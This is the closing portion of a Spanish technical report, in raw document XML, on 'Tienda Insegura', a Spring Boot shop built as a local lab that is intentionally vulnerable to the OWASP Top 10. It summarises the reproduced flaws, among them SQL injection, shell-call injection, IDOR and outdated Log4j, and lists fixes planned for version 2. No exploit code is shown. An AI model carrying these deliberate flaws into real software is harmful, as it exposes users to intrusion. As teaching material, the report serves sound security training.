          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">La v1 de "Tienda Insegura" cumple su objetivo de materializar, en una aplicación funcional y con un stack tecnológico moderno, las diez categorías del OWASP Top 10:2025. Cada vulnerabilidad quedó ubicada en un componente concreto del código y fue reproducida de extremo a extremo (petición → explotación → evidencia) usando PowerShell y sqlmap desde un entorno Windows, sobre un laboratorio desplegado con Docker Compose.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">La versión 2 del proyecto deberá corregir cada uno de estos hallazgos aplicando, entre otras, las siguientes contramedidas:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="90"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A01/A07 — Incorporar Spring Security con roles y permisos, verificación explícita del rol en cada endpoint administrativo, y comparación del propietario del recurso (pedido, carrito) contra el usuario autenticado.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="90"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A02 — Restringir Actuator a health/info, política de CORS con lista blanca del dominio real del frontend, y desactivar el modo debug.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="90"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>A03 — Actualizar log4j-core y demás dependencias a versiones sin CVE conocidos, e integrar dependency-check en el pipeline de build.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="90"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A04 — Hashing de contraseñas con BCrypt, y secreto de JWT robusto cargado desde variable de entorno / secret manager.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="90"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A05 — Reescribir ProductRepositoryJdbc con PreparedStatement / consultas parametrizadas de JPA, y reemplazar la llamada a shell de ReportService por una API de red nativa de Java (sin invocar al intérprete de comandos).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="90"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A06 — Validar cantidad y stock en el carrito, y derivar cartId de una sesión autenticada y verificada.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="90"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A07 — Rate-limiting y bloqueo temporal de cuenta tras intentos fallidos, expiración real de los JWT.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="90"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A08 — Validación de magic bytes, lista blanca de extensiones, renombrado de archivos con UUID y almacenamiento fuera del webroot.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="90"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A09 — Logging estructurado que enmascare credenciales, con niveles de severidad adecuados y, de ser posible, integración con un SIEM.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="90"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A10 — Respuestas de error genéricas hacia el cliente, con logging detallado solo del lado del servidor, correlacionado por un id de traza.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Adicionalmente, la v2 debe desplegarse con HTTPS/TLS (certificado generado con OpenSSL o un proveedor gratuito) y su propio informe de verificación, confirmando que cada una de las vulnerabilidades aquí documentadas ya no es explotable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1B2A4A" w:sz="12" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="200" w:before="480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B2A4A"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">12. Anexo — Estructura del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C9C9" w:sz="4"/>
              <w:left w:val="single" w:color="C9C9C9" w:sz="4"/>
              <w:bottom w:val="single" w:color="C9C9C9" w:sz="4"/>
              <w:right w:val="single" w:color="C9C9C9" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="EDEDED" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="140"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="140"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>tienda-insegura/</w:t>
              <w:br/>
              <w:t>├── backend/                     # API REST Spring Boot vulnerable</w:t>
              <w:br/>
              <w:t>├── frontend/                    # UI estática HTML/CSS/JS</w:t>
              <w:br/>
              <w:t>├── database/                    # init.sql + backup-v1.sql</w:t>
              <w:br/>
              <w:t>├── docker/                      # Nginx reverse proxy</w:t>
              <w:br/>
              <w:t>├── docs/                        # Arquitectura, despliegue y pruebas</w:t>
              <w:br/>
              <w:t>├── pentesting/sqlmap/           # Guía y scripts automatizados</w:t>
              <w:br/>
              <w:t>├── evidencias/                  # Capturas y salidas</w:t>
              <w:br/>
              <w:t>├── scripts/                     # Verificación del laboratorio</w:t>
              <w:br/>
              <w:t>├── docker-compose.yml</w:t>
              <w:br/>
              <w:t>├── CHANGELOG_V1.md</w:t>
              <w:br/>
              <w:t>└── README.md</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Fin del informe técnico — Versión 1 (aplicativo vulnerable).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>13. Revisión de cierre de la Versión 1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>La revisión final de la V1 corrigió inconsistencias de documentación y mejoró la reproducibilidad del laboratorio sin sanitizar las fallas que deben conservarse para la práctica.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>• Puertos Docker enlazados a 127.0.0.1.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>• Nginx usa backend:8080 y no depende de host.docker.internal.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>• init.sql y backup-v1.sql contienen estructura y datos completos.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>• Datos semilla con dos pedidos para IDOR.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>• Payload UNION corregido para seis columnas PostgreSQL.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>• Guías de arquitectura, despliegue, pentesting, sqlmap, PowerShell y evidencias.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>• Referencia incorrecta a jackson-databind eliminada; Log4j 2.14.1 queda documentado para análisis SCA.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Con estas correcciones, la Versión 1 queda lista para ejecutar y documentar en un laboratorio local. La sanitización funcional corresponde a la Versión 2.</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4"/>
      </w:pBdr>
      <w:jc w:val="right"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        <w:color w:val="888888"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve">Tienda Insegura — Informe Técnico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Tienda Insegura v1</dc:title>
  <dc:creator>Proyecto OWASP Top 10 — Tienda Insegura</dc:creator>
  <cp:lastModifiedBy>Un-named</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-08-01T06:53:32.121Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-08-01T06:53:32.133Z</dcterms:modified>
  <dc:subject>Laboratorio OWASP Top 10 - Versión vulnerable</dc:subject>
  <dc:description>Revisión final de la V1: 2026-08-01</dc:description>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>